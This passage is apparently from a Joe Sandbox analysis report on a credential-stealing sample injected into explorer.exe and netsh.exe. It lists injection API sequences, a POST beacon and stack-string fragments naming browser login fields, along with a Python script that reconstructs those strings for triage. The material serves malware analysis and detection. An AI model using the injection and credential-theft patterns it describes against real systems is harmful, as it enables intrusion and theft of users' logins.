                                                    • Instruction Fuzzy Hash: F6412A70918A088FDB95EFA8C4D87ADB7E0FB68300F44456BC84ADB255DE349949CB85

                                                    Control-flow Graph

                                                    control_flow_graph 293 e4d772e-e4d7768 294 e4d7788-e4d77ab connect 293->294 295 e4d776a-e4d7782 call e4da942 293->295 295->294
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                    • Instruction ID: f58b49679c0f5c24535aa83070acf07174810238ca3de44608e0ce59f1531c87
                                                    • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                    • Instruction Fuzzy Hash: 56015E30618B188FCB84EF5CE088B55B7E0FB58324F1545AED90DCB226C674DC858BC2

                                                    Control-flow Graph

                                                    control_flow_graph 298 e4d7732-e4d7768 299 e4d7788-e4d77ab connect 298->299 300 e4d776a-e4d7782 call e4da942 298->300 300->299
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                    • Instruction ID: 0b46e5aafc861add50c0240425c89af8d5a18a45fe9bcf1fdbd777c69597fbb5
                                                    • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                    • Instruction Fuzzy Hash: A9012170618A1C8FCB84EF5CE048B5577E0FB59314F1545AE980DCB226C674CD858BC2

                                                    Control-flow Graph

                                                    control_flow_graph 411 e4d76b2-e4d76e5 412 e4d7705-e4d772d send 411->412 413 e4d76e7-e4d76ff call e4da942 411->413 413->412
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                    • Instruction ID: 0cfa5073a0c2e7e1919dbaa474929e0c79bcf6c4263e0d7e779bba087bd29c23
                                                    • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                    • Instruction Fuzzy Hash: 0501127061CA188FDB84EF5CD049B2577E0EB58314F1645AED85DCB266C670DC858B85

                                                    Control-flow Graph

                                                    control_flow_graph 416 e4d75b2-e4d75ea 417 e4d75ec-e4d7604 call e4da942 416->417 418 e4d760a-e4d762b socket 416->418 417->418
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                    • Instruction ID: 52338d8e4ed7173a61fb96253fdb4a7c23469fd1a8d19c0b3a7bb51e847a73c8
                                                    • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                    • Instruction Fuzzy Hash: B1017C30618A188FCB84EF1CE048B50BBE0FB59314F1545AEE80ECB226D7B0C9858B86

                                                    Control-flow Graph

                                                    control_flow_graph 421 e4cf2dd-e4cf320 call e4da942 424 e4cf3fa-e4cf40e 421->424 425 e4cf326 421->425 426 e4cf328-e4cf339 SleepEx 425->426 426->426 427 e4cf33b-e4cf341 426->427 428 e4cf34b-e4cf352 427->428 429 e4cf343-e4cf349 427->429 431 e4cf354-e4cf35a 428->431 432 e4cf370-e4cf376 428->432 429->428 430 e4cf35c-e4cf36a call e4d9f12 429->430 430->432 431->430 431->432 434 e4cf378-e4cf37e 432->434 435 e4cf3b7-e4cf3bd 432->435 434->435 437 e4cf380-e4cf38a 434->437 438 e4cf3bf-e4cf3cf call e4cfe72 435->438 439 e4cf3d4-e4cf3db 435->439 437->435 442 e4cf38c-e4cf3b1 call e4d0432 437->442 438->439 439->426 441 e4cf3e1-e4cf3f5 call e4cf0f2 439->441 441->426 442->435
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                    • Instruction ID: 25d020337ab49c6ef6dac3127a1c2dcbcf4c8c5d313aaef7ccd61f7cfc082f6c
                                                    • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                    • Instruction Fuzzy Hash: 93318F78614B09EFCBA4DF6A80582A6B7E2FB44300F44467FC91DC7216C7789859CF91

                                                    Control-flow Graph

                                                    control_flow_graph 457 e4cf412-e4cf446 call e4da942 460 e4cf448-e4cf472 call e4dcc9e CreateThread 457->460 461 e4cf473-e4cf47d 457->461
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                    • Instruction ID: cd79fc34891f5e6a7537583f3bc89d46798a621262ff2c3dd2fa73f1124540ad
                                                    • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                    • Instruction Fuzzy Hash: 53F0C230268A484FD788EF2CD49563AF3D0EBA9215F450A3FA54DC3264DA69C9818716
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                    • API String ID: 0-393284711
                                                    • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                    • Instruction ID: 51c8af2c41796cfee720833fc57c62f2a00052dacdfe75f14b675e272b21b302
                                                    • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                    • Instruction Fuzzy Hash: 4FE18A74618F488FC7A4DF28C4857AAB7E0FB98300F504A2EA59BCB255DF34A541CB89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                    • API String ID: 0-2916316912
                                                    • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                    • Instruction ID: 1743b38f96bd59d5f1a114e498c78864e3bcd70ca3595ed57b479430cf416192
                                                    • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                    • Instruction Fuzzy Hash: 5AB18B30518B488EDB95EF68C486AEEB7F1FF98300F50451EE49ACB251EF70A545CB86
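The "String ID" fields in the entries above do not list readable strings: they list the short literals IDA recovered from the functions, joined with "$" and sorted, which is what stack-string construction from 1-, 2- and 4-byte immediates looks like after extraction ("kern", "el32", ".dll" instead of "kernel32.dll"; "Co", "nnec", "tion", ": cl", "ose" instead of "Connection: close"). The following is an added example written for this page, not code from Joe Sandbox or from the sample: it takes the String ID values copied from the entries above and tests whether a candidate string can be tiled from the fragments of one entry, each fragment used no more often than it occurs. The candidate list is this editor's reading of the fragments (kernel32/user32/wininet for the API resolver, "Connection: close" and the &un=/&br= parameters for the HTTP beacon, Firefox logins.json field names for the credential grabber) and is an assumption, not a finding of the report; the entry labels are likewise the editor's, keyed to the API ID or dump offset of the entry they were copied from.

```python
from __future__ import annotations

from collections import Counter

# String ID values copied verbatim from the report entries above (explorer.exe
# memory dumps at 0x0E450000 and 0x10600000). Joe Sandbox joins the recovered
# literals with '$' and sorts them, so multi-chunk stack strings arrive shuffled.
# The labels are the editor's, not the report's.
REPORT_STRING_IDS = {
    "getaddrinfo/recv/setsockopt": "Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion",
    "CreateMutex": ".dll$el32$kern",
    "loader (10600000)": ".dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini",
    "credential grabber (10600000)": "Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte",
}

# Candidate strings to look for. Assumption by the editor, based on reading the
# fragments; this list is not sandbox output.
CANDIDATES = [
    "Connection: close", "GET ", "dat=", "&un=", "&br=", "&sql",
    "kernel32.dll", "user32.dll", "wininet.dll", "ntdll.dll",
    "encryptedUsername", "encryptedPassword", "usernameField",
    "formSubmitURL", "guid",
]


def parse_string_id(field: str) -> list[str]:
    """Split a 'String ID' value into fragments, dropping empty ones.

    An empty fragment would match at every position without advancing,
    so it must never reach the tiler.
    """
    return [frag for frag in field.split("$") if frag]


def tile(candidate: str, fragments: list[str]) -> list[str] | None:
    """Return the ordered fragments that concatenate to `candidate`, or None.

    The chunk alignment is unknown (the compiler may emit 1-, 2- or 4-byte
    moves, and the report drops nothing but order), so this is a backtracking
    search over the fragment multiset rather than a fixed 4-byte split. A
    fragment may be used at most as many times as it occurs in the entry.
    """
    pool = Counter(fragments)
    path: list[str] = []

    def search(pos: int) -> bool:
        if pos == len(candidate):
            return True
        for frag in list(pool):
            if pool[frag] > 0 and candidate.startswith(frag, pos):
                pool[frag] -= 1
                path.append(frag)
                if search(pos + len(frag)):
                    return True
                path.pop()          # dead end: give the fragment back and try the next one
                pool[frag] += 1
        return False

    return list(path) if search(0) else None


def triage(report_ids: dict[str, str], candidates: list[str]) -> dict[str, dict[str, list[str]]]:
    """For each report entry, map every candidate it can fully reconstruct to its tiling."""
    hits: dict[str, dict[str, list[str]]] = {}
    for label, field in report_ids.items():
        fragments = parse_string_id(field)
        found: dict[str, list[str]] = {}
        for cand in candidates:
            parts = tile(cand, fragments)
            if parts is not None:
                found[cand] = parts
        hits[label] = found
    return hits


if __name__ == "__main__":
    for label, found in triage(REPORT_STRING_IDS, CANDIDATES).items():
        print(label)
        for cand, parts in found.items():
            print(f"  {cand!r:22} <- {' + '.join(repr(p) for p in parts)}")
```

A candidate that fails to tile is a prompt to look at the function, not proof the string is absent: "formSubmitURL" stops one character short because no "L" fragment appears in the entry, so either the last byte was emitted in a form IDA did not record as a string or the field is built differently. Multiplicity matters for the same reason; "encr" and "ypte" appear twice in the credential-grabber entry, which is what lets both "encryptedUsername" and "encryptedPassword" tile from it.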
                                                    Strings
                                                    Memory Dump Source

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 619
Total number of Limit Nodes: 78
30cac30 LdrLoadDll 108654->108655 108656 30cadc6 108655->108656 108657 30cac30 LdrLoadDll 108656->108657 108658 30cadcf 108657->108658 108659 30cac30 LdrLoadDll 108658->108659 108660 30cadd8 108659->108660 108661 30cac30 LdrLoadDll 108660->108661 108662 30cade1 108661->108662 108663 30cac30 LdrLoadDll 108662->108663 108664 30cadea 108663->108664 108665 30cac30 LdrLoadDll 108664->108665 108666 30cadf6 108665->108666 108667 30cac30 LdrLoadDll 108666->108667 108668 30cadff 108667->108668 108669 30cac30 LdrLoadDll 108668->108669 108670 30cae08 108669->108670 108671 30cac30 LdrLoadDll 108670->108671 108672 30cae11 108671->108672 108673 30cac30 LdrLoadDll 108672->108673 108674 30cae1a 108673->108674 108675 30cac30 LdrLoadDll 108674->108675 108676 30cae23 108675->108676 108677 30cac30 LdrLoadDll 108676->108677 108678 30cae2f 108677->108678 108679 30cac30 LdrLoadDll 108678->108679 108680 30cae38 108679->108680 108681 30cac30 LdrLoadDll 108680->108681 108682 30cae41 108681->108682 108683 30cac30 LdrLoadDll 108682->108683 108684 30cae4a 108683->108684 108685 30cac30 LdrLoadDll 108684->108685 108686 30cae53 108685->108686 108687 30cac30 LdrLoadDll 108686->108687 108688 30cae5c 108687->108688 108689 30cac30 LdrLoadDll 108688->108689 108690 30cae68 108689->108690 108691 30cac30 LdrLoadDll 108690->108691 108692 30cae71 108691->108692 108693 30cac30 LdrLoadDll 108692->108693 108694 30cae7a 108693->108694 108695 30cac30 LdrLoadDll 108694->108695 108696 30cae83 108695->108696 108697 30cac30 LdrLoadDll 108696->108697 108698 30cae8c 108697->108698 108699 30cac30 LdrLoadDll 108698->108699 108700 30cae95 108699->108700 108701 30cac30 LdrLoadDll 108700->108701 108702 30caea1 108701->108702 108703 30cac30 LdrLoadDll 108702->108703 108704 30caeaa 108703->108704 108705 30cac30 LdrLoadDll 108704->108705 108706 30caeb3 108705->108706 108707 30cac30 LdrLoadDll 108706->108707 108708 30caebc 108707->108708 108709 30cac30 LdrLoadDll 108708->108709 108710 30caec5 108709->108710 108711 30cac30 
LdrLoadDll 108710->108711 108712 30caece 108711->108712 108713 30cac30 LdrLoadDll 108712->108713 108714 30caeda 108713->108714 108715 30cac30 LdrLoadDll 108714->108715 108716 30caee3 108715->108716 108717 30cac30 LdrLoadDll 108716->108717 108718 30caeec 108717->108718 108718->108497 108720 30caf60 LdrLoadDll 108719->108720 108721 30c9edc 108720->108721 108751 3d02df0 LdrInitializeThunk 108721->108751 108722 30c9ef3 108722->108418 108724->108494 108726 30caf60 LdrLoadDll 108725->108726 108727 30ca55c 108726->108727 108727->108486 108729 30ccf46 108728->108729 108730 30ccf40 108728->108730 108731 30cbf90 2 API calls 108729->108731 108730->108603 108732 30ccf6c 108731->108732 108732->108603 108733->108608 108735 30ccfd0 108734->108735 108736 30cd02d 108735->108736 108737 30cbf90 2 API calls 108735->108737 108736->108608 108738 30cd00a 108737->108738 108739 30cbdc0 2 API calls 108738->108739 108739->108736 108740->108621 108741->108623 108742->108625 108743->108628 108744->108601 108746 30cac4b 108745->108746 108747 30c4e50 LdrLoadDll 108746->108747 108748 30cac6b 108747->108748 108749 30c4e50 LdrLoadDll 108748->108749 108750 30cad17 108748->108750 108749->108750 108750->108645 108751->108722 108753 3d02c11 108752->108753 108754 3d02c1f LdrInitializeThunk 108752->108754 108753->108503 108754->108503 108756 30ca68c RtlFreeHeap 108755->108756 108757 30caf60 LdrLoadDll 108755->108757 108756->108507 108757->108756 108759 30b7eab 108758->108759 108760 30b7eb0 108758->108760 108759->108426 108761 30cbd40 LdrLoadDll 108760->108761 108762 30b7ed5 108761->108762 108763 30b7f38 108762->108763 108764 30c9ec0 2 API calls 108762->108764 108765 30b7f3e 108762->108765 108769 30cbd40 LdrLoadDll 108762->108769 108774 30ca5c0 108762->108774 108763->108426 108764->108762 108766 30b7f64 108765->108766 108768 30ca5c0 2 API calls 108765->108768 108766->108426 108770 30b7f55 108768->108770 108769->108762 108770->108426 108772 30b817e 108771->108772 108773 30ca5c0 2 API calls 108771->108773 
108772->108383 108773->108772 108775 30ca5dc 108774->108775 108776 30caf60 LdrLoadDll 108774->108776 108779 3d02c70 LdrInitializeThunk 108775->108779 108776->108775 108777 30ca5f3 108777->108762 108779->108777 108781 30cb5c3 108780->108781 108784 30bacf0 108781->108784 108785 30bad14 108784->108785 108786 30bad50 LdrLoadDll 108785->108786 108787 30b9c4a 108785->108787 108786->108787 108787->108389 108790 30bb063 108788->108790 108789 30bb0e0 108789->108396 108790->108789 108803 30c9c90 LdrLoadDll 108790->108803 108793 30caf60 LdrLoadDll 108792->108793 108794 30bf1bb 108793->108794 108794->108399 108795 30ca7d0 108794->108795 108796 30ca7ef LookupPrivilegeValueW 108795->108796 108797 30caf60 LdrLoadDll 108795->108797 108796->108401 108797->108796 108799 30ca27c 108798->108799 108800 30caf60 LdrLoadDll 108798->108800 108804 3d02ea0 LdrInitializeThunk 108799->108804 108800->108799 108801 30ca29b 108801->108402 108803->108789 108804->108801 108806 30bb1f0 108805->108806 108807 30bb040 LdrLoadDll 108806->108807 108808 30bb204 108807->108808 108808->108336 108810 30baf34 108809->108810 108882 30c9c90 LdrLoadDll 108810->108882 108812 30baf6e 108812->108338 108814 30bf3ac 108813->108814 108815 30bb1c0 LdrLoadDll 108814->108815 108816 30bf3be 108815->108816 108883 30bf290 108816->108883 108819 30bf3d9 108822 30bf3e4 108819->108822 108823 30ca490 2 API calls 108819->108823 108820 30bf3f1 108821 30bf402 108820->108821 108824 30ca490 2 API calls 108820->108824 108821->108342 108822->108342 108823->108822 108824->108821 108826 30bf43c 108825->108826 108902 30bb2b0 108826->108902 108828 30bf44e 108829 30bf290 3 API calls 108828->108829 108830 30bf45f 108829->108830 108831 30bf469 108830->108831 108832 30bf481 108830->108832 108833 30bf474 108831->108833 108835 30ca490 2 API calls 108831->108835 108834 30bf492 108832->108834 108836 30ca490 2 API calls 108832->108836 108833->108344 108834->108344 108835->108833 108836->108834 108838 30bcaa6 108837->108838 108839 30bcab0 
108837->108839 108838->108353 108840 30baf10 LdrLoadDll 108839->108840 108841 30bcb4e 108840->108841 108842 30bcb74 108841->108842 108843 30bb040 LdrLoadDll 108841->108843 108842->108353 108844 30bcb90 108843->108844 108845 30c4a50 8 API calls 108844->108845 108846 30bcbe5 108845->108846 108846->108353 108848 30bd646 108847->108848 108849 30bb040 LdrLoadDll 108848->108849 108850 30bd65a 108849->108850 108906 30bd310 108850->108906 108852 30b908b 108853 30bcc00 108852->108853 108854 30bcc26 108853->108854 108855 30bb040 LdrLoadDll 108854->108855 108856 30bcca9 108854->108856 108855->108856 108857 30bb040 LdrLoadDll 108856->108857 108858 30bcd16 108857->108858 108859 30baf10 LdrLoadDll 108858->108859 108860 30bcd7f 108859->108860 108861 30bb040 LdrLoadDll 108860->108861 108862 30bce2f 108861->108862 108862->108366 108935 30bf6d0 108863->108935 108865 30b8f25 108865->108321 108866 30b8d14 108866->108865 108940 30c43a0 108866->108940 108868 30b8d70 108868->108865 108943 30b8ab0 108868->108943 108871 30ccf30 2 API calls 108872 30b8db2 108871->108872 108873 30cd060 3 API calls 108872->108873 108877 30b8dc7 108873->108877 108874 30b7ea0 3 API calls 108874->108877 108877->108865 108877->108874 108878 30bc7b0 16 API calls 108877->108878 108879 30b8160 2 API calls 108877->108879 108949 30bf670 108877->108949 108953 30bf080 19 API calls 108877->108953 108878->108877 108879->108877 108880->108345 108881->108364 108882->108812 108884 30bf2aa 108883->108884 108892 30bf360 108883->108892 108885 30bb040 LdrLoadDll 108884->108885 108886 30bf2cc 108885->108886 108893 30c9f40 108886->108893 108888 30bf30e 108896 30c9f80 108888->108896 108891 30ca490 2 API calls 108891->108892 108892->108819 108892->108820 108894 30c9f5c 108893->108894 108895 30caf60 LdrLoadDll 108893->108895 108894->108888 108895->108894 108897 30caf60 LdrLoadDll 108896->108897 108898 30c9f9c 108897->108898 108901 3d035c0 LdrInitializeThunk 108898->108901 108899 30bf354 108899->108891 108901->108899 108903 30bb2d7 
108902->108903 108904 30bb040 LdrLoadDll 108903->108904 108905 30bb313 108904->108905 108905->108828 108907 30bd327 108906->108907 108915 30bf710 108907->108915 108911 30bd3a2 108911->108852 108912 30bd39b 108912->108911 108926 30ca2a0 LdrLoadDll 108912->108926 108914 30bd3b5 108914->108852 108916 30bf735 108915->108916 108927 30b81a0 108916->108927 108918 30bf759 108919 30bd36f 108918->108919 108920 30c4a50 8 API calls 108918->108920 108922 30cbdc0 2 API calls 108918->108922 108934 30bf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 108918->108934 108923 30ca6e0 108919->108923 108920->108918 108922->108918 108924 30caf60 LdrLoadDll 108923->108924 108925 30ca6ff CreateProcessInternalW 108924->108925 108925->108912 108926->108914 108928 30b829f 108927->108928 108929 30b81b5 108927->108929 108928->108918 108929->108928 108930 30c4a50 8 API calls 108929->108930 108931 30b8222 108930->108931 108932 30cbdc0 2 API calls 108931->108932 108933 30b8249 108931->108933 108932->108933 108933->108918 108934->108918 108936 30bf6ef 108935->108936 108937 30c4e50 LdrLoadDll 108935->108937 108938 30bf6fd 108936->108938 108939 30bf6f6 SetErrorMode 108936->108939 108937->108936 108938->108866 108939->108938 108954 30bf4a0 108940->108954 108942 30c43c6 108942->108868 108944 30b8aca 108943->108944 108945 30cbd40 LdrLoadDll 108944->108945 108946 30b8ad5 108945->108946 108947 30b8cea 108946->108947 108973 30c9880 108946->108973 108947->108871 108950 30bf683 108949->108950 109021 30c9e90 108950->109021 108953->108877 108955 30bf4bd 108954->108955 108961 30c9fc0 108955->108961 108958 30bf505 108958->108942 108962 30c9fdc 108961->108962 108963 30caf60 LdrLoadDll 108961->108963 108971 3d02f30 LdrInitializeThunk 108962->108971 108963->108962 108964 30bf4fe 108964->108958 108966 30ca010 108964->108966 108967 30caf60 LdrLoadDll 108966->108967 108968 30ca02c 108967->108968 108972 3d02d10 LdrInitializeThunk 108968->108972 108969 30bf52e 108969->108942 108971->108964 108972->108969 108974 
30cbf90 2 API calls 108973->108974 108975 30c9897 108974->108975 108994 30b9310 108975->108994 108977 30c98b2 108978 30c98d9 108977->108978 108979 30c98f0 108977->108979 108980 30cbdc0 2 API calls 108978->108980 108982 30cbd40 LdrLoadDll 108979->108982 108981 30c98e6 108980->108981 108981->108947 108983 30c992a 108982->108983 108984 30cbd40 LdrLoadDll 108983->108984 108986 30c9943 108984->108986 108991 30c9be4 108986->108991 109000 30cbd80 LdrLoadDll 108986->109000 108987 30c9bc9 108988 30c9bd0 108987->108988 108987->108991 108989 30cbdc0 2 API calls 108988->108989 108990 30c9bda 108989->108990 108990->108947 108992 30cbdc0 2 API calls 108991->108992 108993 30c9c39 108992->108993 108993->108947 108995 30b9335 108994->108995 108996 30bacf0 LdrLoadDll 108995->108996 108997 30b9368 108996->108997 108999 30b938d 108997->108999 109001 30bcf20 108997->109001 108999->108977 109000->108987 109002 30bcf4c 109001->109002 109003 30ca1e0 LdrLoadDll 109002->109003 109004 30bcf65 109003->109004 109005 30bcf6c 109004->109005 109012 30ca220 109004->109012 109005->108999 109009 30bcfa7 109010 30ca490 2 API calls 109009->109010 109011 30bcfca 109010->109011 109011->108999 109013 30ca23c 109012->109013 109014 30caf60 LdrLoadDll 109012->109014 109020 3d02ca0 LdrInitializeThunk 109013->109020 109014->109013 109015 30bcf8f 109015->109005 109017 30ca810 109015->109017 109018 30ca82f 109017->109018 109019 30caf60 LdrLoadDll 109017->109019 109018->109009 109019->109018 109020->109015 109022 30c9eac 109021->109022 109023 30caf60 LdrLoadDll 109021->109023 109026 3d02dd0 LdrInitializeThunk 109022->109026 109023->109022 109024 30bf6ae 109024->108877 109026->109024 109027 3adcb84 109030 3ada042 109027->109030 109029 3adcba5 109031 3ada06b 109030->109031 109032 3ada182 NtQueryInformationProcess 109031->109032 109047 3ada56c 109031->109047 109034 3ada1ba 109032->109034 109033 3ada1ef 109033->109029 109034->109033 109035 3ada2db 109034->109035 109036 3ada290 109034->109036 109037 3ada2fc 
NtSuspendThread 109035->109037 109059 3ad9de2 NtCreateSection NtMapViewOfSection NtClose 109036->109059 109038 3ada30d 109037->109038 109041 3ada331 109037->109041 109038->109029 109040 3ada2cf 109040->109029 109043 3ada412 109041->109043 109050 3ad9bb2 109041->109050 109044 3ada531 109043->109044 109046 3ada4a6 NtSetContextThread 109043->109046 109045 3ada552 NtResumeThread 109044->109045 109045->109047 109049 3ada4bd 109046->109049 109047->109029 109048 3ada51c RtlQueueApcWow64Thread 109048->109044 109049->109044 109049->109048 109051 3ad9bf7 109050->109051 109052 3ad9c66 NtCreateSection 109051->109052 109053 3ad9d4e 109052->109053 109054 3ad9ca0 109052->109054 109053->109043 109055 3ad9cc1 NtMapViewOfSection 109054->109055 109055->109053 109056 3ad9d0c 109055->109056 109056->109053 109057 3ad9d88 109056->109057 109058 3ad9dc5 NtClose 109057->109058 109058->109043 109059->109040 109060 30c9080 109061 30cbd40 LdrLoadDll 109060->109061 109063 30c90bb 109061->109063 109062 30c919c 109063->109062 109064 30bacf0 LdrLoadDll 109063->109064 109065 30c90f1 109064->109065 109066 30c4e50 LdrLoadDll 109065->109066 109068 30c910d 109066->109068 109067 30c9120 Sleep 109067->109068 109068->109062 109068->109067 109071 30c8ca0 LdrLoadDll 109068->109071 109072 30c8eb0 LdrLoadDll 109068->109072 109071->109068 109072->109068

Control-flow Graph

control_flow_graph 556 30ca360-30ca3b1 call 30caf60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,030C4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 030CA3AD
Strings
Memory Dump Source
• Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 5415386d4d32352c81088940966342e684f3bce7c0c8a54d36149a54da83d974
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 12F0BDB2211208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Control-flow Graph

control_flow_graph 403 30c9076-30c9079 404 30c9059-30c9075 call 30cabd0 * 2 403->404 405 30c907b-30c90c2 call 30cbd40 403->405 413 30c919c-30c91a2 405->413 414 30c90c8-30c9118 call 30cbe10 call 30bacf0 call 30c4e50 405->414 424 30c9120-30c9131 Sleep 414->424 425 30c9196-30c919a 424->425 426 30c9133-30c9139 424->426 425->413 425->424 427 30c913b-30c9161 call 30c8ca0 426->427 428 30c9163-30c9183 426->428 430 30c9189-30c918c 427->430 428->430 431 30c9184 call 30c8eb0 428->431 430->425 431->430
APIs
• Sleep.KERNELBASE(000007D0), ref: 030C9128
Strings
Memory Dump Source
• Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: POST$net.dll$wininet.dll
• API String ID: 3472027048-3140911592
• Opcode ID: 235e54007d989970cdd084e3f887681ffe68457ca1f981b71e99461c1efbff5f
• Instruction ID: aea58333a86bd991b8c18fb4525c6077a07f93c82b1cd0128d3fdf67d6bdddd8
• Opcode Fuzzy Hash: 235e54007d989970cdd084e3f887681ffe68457ca1f981b71e99461c1efbff5f
• Instruction Fuzzy Hash: EA31D276A02384ABC714EF68C885BAFB7B8EB84704F14805DEA1D6B245D730A610CBA4

Control-flow Graph

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030B836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030B838B
Memory Dump Source
• Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
• Instruction ID: c1148b0dd238de8849f755d0f2bad6463f9ebfb527986baf52d6436e905d32b8
• Opcode Fuzzy Hash: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
• Instruction Fuzzy Hash: 0D01A231A923687BE721E6949C42FFE776C6B80E50F094158FF08BE1C1E6A4690647F6
APIs
